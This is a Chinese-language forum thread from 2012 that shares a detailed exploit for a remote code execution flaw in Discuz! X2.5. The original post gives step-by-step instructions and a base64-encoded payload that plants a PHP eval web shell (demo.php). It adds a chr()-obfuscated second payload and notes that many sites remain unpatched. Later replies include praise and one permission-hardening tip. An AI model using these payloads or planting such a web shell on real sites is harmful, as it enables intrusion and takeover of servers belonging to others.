Discuz!官方免费开源建站系统

 找回密码
 立即注册
搜索

Discuz! X2.5 最新GetShell0day 详细利用

[复制链接]
zdq201212 发表于 2012-10-6 22:45:25 | 显示全部楼层 |阅读模式
Discuz! X2.5 最新GetShell0day 详细利用

听说Discuz!这次又出漏洞了,这次还是个GetShell漏洞呀。这个漏洞比较新,应该很多站还没更新吧。影响版本有:20120407,beta,rc
  Discuz! X2.5 Release 20120407版中的preg_replace使用了e修饰符和双引号,
  在实现上存在远程命令执行漏洞,远程攻击者可利用此漏洞执行远程任意代码。
  要成功利用此漏洞需要目标启用seo功能。
  下面说下利用方法
  1.注册任意账户
  2.登陆用户,发表blog日志(注意是日志)
  3.添加图片,选择网络图片,地址写入 ↓
  {${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
  4.访问日志,论坛根目录下生成demo.php,一句发密码c
  漏洞要开启seo,并且开启用户日志的seo,漏洞鸡肋,黑站就算了。



  补充一下吧,开seo没错,但是并非他说的非得开日志的seo,我上面文章中说的 "各种地方比如 source/include/space/space_blog.php,
  懂的都懂了" 只是随便提个例子而已,其实在任何能够发表文章的地方都可以,最简单的,论坛找个板块发贴子就行,
  这主要看管理员开启了哪个位置的seo,如果不知道管理员开了哪的seo就到处都发一下。



  利用方式也并非非得发blog,也不是非得发网络图片,详细的利用我是比如随便发个贴子,内容
  ${${eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59))}}
  然后给他加上任意超链接,发布即可phpinfo(),enjoy it
本篇文章来源于http://www.carcoo.com转载请标明出处 谢谢 ^_^




回复

使用道具 举报

让故事继续 发表于 2012-10-6 23:23:33 | 显示全部楼层
很厉害 前排占座
回复

使用道具 举报

mark35 发表于 2012-10-7 12:45:30 来自手机 | 显示全部楼层
服务器目录权限要求能写的不能运行,能运行的不能写,基本上就能封堵这种攻击。DZ对特定目录设定777以及在排除故障时把目录777是不合理且不安全的
回复

使用道具 举报

□影□ 发表于 2012-10-23 23:56:32 | 显示全部楼层
黑客啊
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2025-9-11 14:30 , Processed in 0.085985 second(s), 15 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表